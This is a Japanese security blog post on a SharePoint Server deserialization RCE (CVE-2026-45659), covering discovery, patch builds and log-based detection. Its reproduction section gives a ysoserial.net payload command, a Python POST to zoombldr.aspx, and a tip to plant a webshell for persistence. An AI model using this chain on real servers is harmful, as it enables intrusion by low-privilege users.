SharePoint のデシリアライズ RCE:CVE-2026-45659

通常の Site Member アカウントだけで SharePoint サーバー上の任意コード実行が可能です。マイクロソフトは悪用可能性を低と評価しましたが、CISA は KEV に追加し、3 日での対応を求めました。

概要

項目 内容
CVE CVE-2026-45659
CVSS 8.8(High)
CWE CWE-502 信頼できないデータのデシリアライズ
影響製品 SharePoint Server 2016 / 2019 / Subscription Edition
修正手段 2026 年 5 月のセキュリティ更新
公開日 2026-05-21
実悪用 あり(CISA KEV + ランサムウェア関連)

SharePoint Server は社内ネットワークで最も広く展開されるコラボレーション基盤の一つです。この脆弱性は、最低限の Site Member 権限(PR:L)を持つ認証済みの攻撃者に、管理者権限や昇格なしでサーバー上の任意コード実行を許します。

CISA は 2026 年 7 月 1 日にこれを既知の悪用された脆弱性(KEV)へ追加し、連邦機関に 7 月 4 日までの対応を求めました。追加から期限までわずか 3 日です。この速さは二つのことを同時に示します。実際に悪用されており、ランサムウェア攻撃と結びついているということです。

発見の経緯

研究者が監査したのは _layouts 配下の特定端点の処理です。_layouts/15/zoombldr.aspx と _layouts/15/people.aspx は POST 本文の __SPSCEdit フィールドを受け取り、そのフィールドをデシリアライズします。しかしデシリアライズされるデータの出所と型を十分に検証していません。

つまり悪意あるシリアライズ済みペイロードを __SPSCEdit に直接入れられます。サーバーがリクエストを処理する際、デシリアライズが攻撃者の指定した型とコンストラクタを呼び出し、最終的に任意コード実行に至ります。

マイクロソフトは 2026 年 5 月 21 日にアドバイザリとパッチを公開しましたが、初期評価は「悪用可能性は低い」でした。その後 CISA が実際の悪用証拠に基づいて KEV に追加しました。この差自体が結論です。ベンダーの初期評価は最終判断ではありません。

再現

以下はすべて、許可されたセキュリティテストに限ります。

実験環境には Windows Server 2019 または 2022、build 16.0.10417.20128 未満の SharePoint Server 2019、Site Member 権限を持つドメインアカウント、そして ysoserial.net が必要です。

第一段階:.NET デシリアライズペイロードを作成する。 TypeConfuseDelegate 連鎖と BinaryFormatter 形式を使い、base64 で出力します。

.\ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter `
  -c "cmd /c whoami" -o base64

第二段階:利用リクエストを送る。 ペイロードを __SPSCEdit に入れ、リストとソースのフィールドとともに端点へ POST し、Site Member として認証します。

data = {
    "__SPSCEdit": payload_b64,
    "__List": "Documents",
    "__Source": f"{target}/Documents/Forms/AllItems.aspx",
}
session.post(f"{target}/_layouts/15/zoombldr.aspx", data=data, auth=(user, pwd))

200 は受理、401 は資格情報の問題、403 は権限不足です。この脆弱性に必要なのは最下位の Site Member です。

第三段階:確認と後処理。 コマンド出力があれば応答を直接読みます。無ければホスト名を含むサブドメインの名前解決など DNS 外帯で実行を確認します。コードが動けば、次の典型的な行動は永続化のためのウェブシェルを Web から到達できるディレクトリへ書き込むことです。_layouts、_vti_bin、LAYOUTS/TEMPLATE がよく使われる置き場所です。

修正

2026 年 5 月の SharePoint セキュリティ更新を適用します。修正後の内部ビルドは次のとおりです。

製品 修正後のビルド
Subscription Edition 16.0.19725.20280
Server 2019 16.0.10417.20128
Enterprise Server 2016 16.0.5552.1002

検知は SharePoint の監査ログと IIS ログを中心に、_layouts/15/zoombldr.aspx と _layouts/15/people.aspx への異常な POST、__SPSCEdit の異常な使用、Web から到達できるディレクトリに現れた不審なファイル(.aspx のウェブシェルなど)、異常な子プロセス生成を確認します。

多層防御は最小権限の原則に沿って進めます。Site Member の付与を制限し、管理端点と _layouts へのネットワーク到達を絞り、詳細な監査ログを有効にして、不審なコード実行を監視する EDR を配備します。

判断

重大性は低権限で利用できる条件から来ています。通常の Site Member アカウント、すなわち多くの SharePoint 環境が普通の社員に既定で付与する水準で、サーバー上の任意コード実行が可能です。フィッシングで通常のドメイン資格情報を一つ得れば、それが内部侵入の足場になります。

マイクロソフトの「悪用可能性は低い」と、CISA が KEV に追加して 3 日の期限を課したことの差は、この事例で最も持ち帰る価値のある教訓です。実悪用の状況は継続的に追う必要があり、公開日に結論を出すべきものではありません。

← 記事一覧に戻る

コメント

…